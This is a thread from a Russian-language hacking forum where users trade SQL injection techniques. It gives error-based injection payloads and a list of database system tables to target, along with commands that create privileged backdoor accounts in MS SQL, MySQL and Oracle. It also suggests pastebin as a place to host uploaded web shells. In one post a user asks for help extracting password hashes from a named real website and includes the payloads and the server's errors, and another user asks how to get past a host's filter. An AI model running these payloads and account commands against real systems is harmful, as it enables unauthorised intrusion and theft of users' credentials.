16.05.2011, 10:42
|
|
Новичок
Регистрация: 12.03.2010
Сообщений: 7
С нами:
8509359
Репутация:
0
|
|
i want to use in toolza floor rand how can i use in toolza
this site to get info
http://www.site.com/get.php?id=15 AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 22,1),FLOOR(RAND(0)*2)))
|
|
|
19.05.2011, 00:23
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Почему бы не добавить в первые посты инфу о том, как крутить скули через ошибку Duplicate entry ?
|
|
|
|
19.05.2011, 16:33
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от попугай
Почему бы не добавить в первые посты инфу о том, как крутить скули через ошибку Duplicate entry ?
Потому что есть статья Быстрый Blind SQL Injection
|
|
|
|
19.05.2011, 21:59
|
|
Участник форума
Регистрация: 28.09.2010
Сообщений: 159
С нами:
8222006
Репутация:
0
|
|
Все просто. Кому не хватает материала в этой теме, переходите по ссылке тут
|
|
|
|
20.05.2011, 02:42
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от Gervorovski
Все просто. Кому не хватает материала в этой теме, переходите по ссылке
тутСсылки на поиск не статичные. Пиши поисковые запросы словами.
|
|
|
|
18.06.2011, 11:39
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
С нами:
8411065
Репутация:
4
|
|
Добавлю от себя
стандартные базы
Oracle
SYS.USER_OBJECTS (USEROBJECTS)
SYS.USER_VIEWS
SYS.USER_TABLES
SYS.USER_VIEWS
SYS.USER_TAB_COLUMNS
SYS.USER_CATALOG
SYS.USER_TRIGGERS
SYS.ALL_TABLES
SYS.TAB
MySQL
mysql.user
mysql.host
mysql.db
MS access
MsysACEs
MsysObjects
MsysQueries
MsysRelationships
MS SQL Server
sysobjects
syscolumns
systypes
sysdatabases
Создать пользователя:
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass'))
Для тех кто не может определится с хостингом для заливки шелла
заходим создаем сообщение на pastebin.com затем заходим скачать файл
http://pastebin.com/download.php?i=[xxx]
это и будет ссылка на файл.
|
|
|
|
18.06.2011, 15:16
|
|
Новичок
Регистрация: 13.04.2010
Сообщений: 0
С нами:
8462565
Репутация:
0
|
|
Сообщение от kroŧ
Добавлю от себя
стандартные базы
Oracle
SYS.USER_OBJECTS (USEROBJECTS)
SYS.USER_VIEWS
SYS.USER_TABLES
SYS.USER_VIEWS
SYS.USER_TAB_COLUMNS
SYS.USER_CATALOG
SYS.USER_TRIGGERS
SYS.ALL_TABLES
SYS.TAB
MySQL
mysql.user
mysql.host
mysql.db
MS access
MsysACEs
MsysObjects
MsysQueries
MsysRelationships
MS SQL Server
sysobjects
syscolumns
systypes
sysdatabases
Создать пользователя:
MS SQL
exec sp_addlogin 'name' , 'password'
exec sp_addsrvrolemember 'name' , 'sysadmin'
Access
CRATE USER name IDENTIFIED BY 'pass123'
Postgres (requires Unix account)
CRATE USER name WITH PASSWORD 'pass123'
Oracle
CRATE USER name IDENTIFIED BY pass123
TEMPORARY TABLESPACE temp
DEFAULT TABLESPACE users;
GRANT CONNECT TO name;
GRANT RESOURCE TO name;
MySQL
INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass'))
Для тех кто не может определится с хостингом для заливки шелла
заходим создаем сообщение на pastebin.com затем заходим скачать файл
http://pastebin.com/download.php?i=[xxx]
это и будет ссылка на файл.
Postgresql есть?
|
|
|
|
05.07.2011, 15:53
|
|
Новичок
Регистрация: 26.06.2011
Сообщений: 1
С нами:
7831766
Репутация:
0
|
|
Помогите скуль раскрутить
Код:
http://realtyvision.ru/analytics/?id_group=1+union+%20SELECT%20password%20FROM%20%60op2_discussion_users%60%20WHERE%20%60id%60=1+--+
Сообщение от None
SQL Error: Unknown column 'date' in 'where clause' at /home/u68468/realtyvision.ru/www/system/reanalytics.php line 130
Код:
http://realtyvision.ru/analytics/?id_group=1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28op2_discussion_users.password+as+char%29%29%29%2C0x27%2C0x7e%29+FROM+%60u68468%60.op2_discussion_users+Order+by+login+LIMIT+5%2C1%29+%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1
Сообщение от None
SQL Error: Subquery returns more than 1 row at /home/u68468/realtyvision.ru/www/system/reanalytics.php line 130
|
|
|
|
07.07.2011, 19:09
|
|
Новичок
Регистрация: 03.07.2011
Сообщений: 16
С нами:
7821686
Репутация:
0
|
|
доброго дня .... такая ситуация :
сайт имеет возможность sql inject. ... нахожу количество столбцов через group by ..... но при попытке определить названия таблиц и стоблбцов (через INFORMATION_SCHEMA) сразу перекидывает на страницу хостинга с сообщением приблизительно такого содержания "Сервер отверг ваш запрос, возможно он опасен и т д ..." ..... на некоторых других сайтах похожие ситуации - подсовываю кавычку, вылетает SQL-ная ошибка, прямой вывод на страницу отсутсвует, при поытке вывода через ошибку опять же вылетает хостинга с "запрос отвергнут, так как опасен и т д ......" ...... О чём это может говорить ? инъекция тут не актуальна ? или всё же можно както обойти этот ?
|
|
|
|
07.07.2011, 19:18
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от mega_667
доброго дня .... такая ситуация :
сайт имеет возможность sql inject. ... нахожу количество столбцов через group by ..... но при попытке определить названия таблиц и стоблбцов (через INFORMATION_SCHEMA) сразу перекидывает на страницу хостинга с сообщением приблизительно такого содержания "Сервер отверг ваш запрос, возможно он опасен и т д ..." ..... на некоторых других сайтах похожие ситуации - подсовываю кавычку, вылетает SQL-ная ошибка, прямой вывод на страницу отсутсвует, при поытке вывода через ошибку опять же вылетает хостинга с "запрос отвергнут, так как опасен и т д ......" ...... О чём это может говорить ? инъекция тут не актуальна ? или всё же можно както обойти этот ?
операторы фильтруются. ничего не сделать. а хостинг попробую угадать - sweb
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
